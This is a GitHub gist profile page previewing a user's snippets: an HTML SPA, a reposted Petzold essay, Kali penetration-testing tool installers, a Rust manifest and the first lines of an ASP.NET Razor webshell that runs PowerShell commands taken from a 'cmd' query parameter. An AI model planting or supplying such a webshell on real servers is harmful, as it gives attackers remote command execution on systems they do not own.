Skip to content

Instantly share code, notes, and snippets.

View akses0's full-sized avatar
:octocat:

ɐʞsǝs akses0

:octocat:
View GitHub Profile
@akses0
akses0 / cursed-spa.html
Last active March 6, 2026 06:41
THE MOST CURSED OF SINGLE PAGE APPLICATIONS (SPA)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>XSLT SPA — Minimal JS Edition</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&family=Orbitron:wght@400;700;900&display=swap');
:root {
@akses0
akses0 / does_visual_studio_rot_the_mind.md
Created January 11, 2026 12:45
Does Visual Studio Rot the Mind?

a classic, backed up from the original here: https://www.charlespetzold.com/etcetera/DoesVisualStudioRotTheMind.html

Does Visual Studio Rot the Mind? Ruminations on the Psychology and Aesthetics of Coding By Charles Petzold A Talk Delivered at the NYC .NET Developer’s Group, October 20, 2005 Abstract: Visual Studio can be one of the programmer's best friends, but over the years it has become increasingly pushy, domineering, and suffering from unsettling control issues. Should we just surrender to Visual Studio's insistence on writing our code for us? Or is Visual Studio sapping our programming intelligence rather than augmenting it? This talk dissects the code generated by Visual Studio; analyzes the appalling programming practices it perpetuates; rhapsodizes about the joys, frustrations, and satisfactions of unassisted coding; and speculates about the radical changes that Avalon will bring.

I don’t speak to user groups or developer groups very often, partially because of a bad experience I had a number of

@akses0
akses0 / kali-plus-install.sh
Last active October 30, 2025 11:47
Just a quick tools installer to augment kali to have other tools that I like to use. Configures neovim to use lazy plugin manager and adds the dracula theme.
#!/bin/bash
set -e
sudo apt update
sudo apt install -y python3 python3-pip python3-venv
sudo apt install -y openvpn ranger neovim python3-neovim seclists curl dnsrecon enum4linux feroxbuster gobuster impacket-scripts nbtscan nikto nmap onesixtyone oscanner redis-tools smbclient smbmap snmp sslscan sipvicious tnscmd10g whatweb
python3 -m pipx ensurepath
[ -f ~/.zshrc ] && source ~/.zshrc
[ -f ~/.bashrc ] && source ~/.bashrc
@akses0
akses0 / kali-setup.sh
Last active August 15, 2024 14:51
simple kali setup script
#!/bin/bash
read "Please make sure you read and understand this script before you run it. Proceed? (y/n)" answer
if [[ $answer == [Yy] ]]; then
# Update the System
echo "Updating system..."
sudo apt update && sudo apt upgrade -y
# Enable the Firewall (UFW)
echo "Installing and enabling UFW..."
@akses0
akses0 / cargo.toml
Last active September 16, 2020 11:49
Boilerplate commandline application with subcommand parsing courtesy of clap
[package]
name = "my_app"
version = "0.1.0"
authors = ["seska451"]
edition = "2018"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
clap = "3.0.0-beta.1"
@akses0
akses0 / template.cshtml
Last active April 4, 2020 12:30
Basic ASP MVC Razor webshell with powershell
@using System.Diagnostics;
@using System.IO;
@{
var cmd = Request.QueryString["cmd"];
var output = "";
if(string.IsNullOrWhiteSpace(cmd) == false) {
output = powershell(cmd);
}